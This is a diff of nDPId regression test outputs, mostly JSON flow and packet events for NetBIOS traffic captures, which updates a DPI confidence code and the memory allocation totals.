00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1447772248480,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772248480,"pkt":"ABzEEHkPAOCBt8asCABFAABORZkAAIAR1wUKAAXpCgAEGACJAIkAOgf2mjgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772251795,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1447772251795,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772251795,"pkt":"ABzEEHkPACFislxDCABFAABOJRwAAH8R\/RQKAAFXCgAEGOJBAIkAOqRfIKgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772251795,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772251795,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1447772251795,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1447772251795,"pkt":"ACFislxDABzEEHkPCABFAADLQERAAIARoG8KAAQYCgABVwCJ4kEAt5PzIKiEAAAAAAEAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAEAAAAAAHcER1VOTkFSICAgICAgICAgAAQAVklHSUxBTlRfR1JPVVAgAIQAR1VOTkFSICAgICAgICAgIAQAVklHSUxBTlRfR1JPVVAgHoQAABzEEHkPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1447772211392,"flow_last_seen":1447772269350,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2950,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1447772238479,"flow_last_seen":1447772248481,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221882,"flow_last_seen":1447772239929,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":181,"flow_first_seen":1447772210350,"flow_last_seen":1447772269972,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":9050,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1447772211392,"flow_last_seen":1447772269350,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2950,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1447772238479,"flow_last_seen":1447772248481,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221882,"flow_last_seen":1447772239929,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":181,"flow_first_seen":1447772210350,"flow_last_seen":1447772269972,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":9050,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","packets-captured":260,"packets-processed":260,"total-skipped-flows":0,"total-l4-payload-len":13727,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":15,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":73,"global_ts_msec":1447772269972} @@ -79,9 +79,9 @@ ~~ total active/idle flows...: 15/15 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5893619 bytes -~~ total memory freed........: 5893619 bytes -~~ total allocations/frees...: 118422/118422 +~~ total memory allocated....: 6027253 bytes +~~ total memory freed........: 6027253 bytes +~~ total allocations/frees...: 121184/121184 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 806 chars diff --git a/test/results/netbios_wildcard_dns_query.pcap.out b/test/results/netbios_wildcard_dns_query.pcap.out index 27708b834..04568b235 100644 --- a/test/results/netbios_wildcard_dns_query.pcap.out +++ b/test/results/netbios_wildcard_dns_query.pcap.out @@ -2,7 +2,7 @@ 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1597866040493} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1597866040493,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1597866040493,"pkt":"AAkPCQEKAFBWvdjVCABFAABOhIlAAEARHAYKAUP6CgFCFKF3ADUAOgSEgPAAEAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} 